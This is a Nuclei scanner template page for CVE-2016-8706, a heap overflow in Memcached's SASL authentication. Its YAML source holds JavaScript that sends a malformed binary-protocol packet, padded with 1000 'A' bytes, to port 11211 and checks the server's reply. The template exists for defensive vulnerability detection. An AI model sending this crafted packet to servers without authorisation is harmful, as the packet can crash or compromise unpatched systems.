Skip to content
Nuclei Templates

Memcached Server SASL Authentication - Remote Code Execution

ID: CVE-2016-8706

Severity: high

Author: pussycat0x

Tags: cve,cve2016,rce,js,memcached

Description

Section titled “Description”

An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.

YAML Source

Section titled “YAML Source”
id: CVE-2016-8706


info:
  name: Memcached Server SASL Authentication - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
  reference:
    - https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
    - https://nvd.nist.gov/vuln/detail/CVE-2016-8706
    - http://rhn.redhat.com/errata/RHSA-2016-2819.html
    - http://www.debian.org/security/2016/dsa-3704
    - http://www.securitytracker.com/id/1037333
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2016-8706
    cwe-id: CWE-190
    epss-score: 0.89998
    epss-percentile: 0.98714
    cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: memcached
    product: memcached
    verfied: true
  tags: cve,cve2016,rce,js,memcached


javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      packet.Write(new Uint8Array([0x80, 0x21]))
      let cmd = 'stats'
      packet.WriteString(cmd)
      packet.Pack("!H", [32]);
      packet.Pack("!I", [1]);
      let buzz = Array(1000).fill("A").join('');
      packet.WriteString(buzz)
      const c = require("nuclei/net");
      let conn = c.Open('tcp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
      conn.RecvString();
    args:
      Host: "{{Host}}"
      Port: 11211


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Invalid arguments"


      - type: word
        words:
          - "Auth failure"
        negative: true
# digest: 4a0a004730450220383bbb7799bd6d7c41a424f73403d72b74a250524bafced2284dc91f813cb1cc022100d293f668c8df2fc5299025d834ac92832487e05bd6d145b2368433e30d478a20:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "javascript/cves/2016/CVE-2016-8706.yaml"

View on Github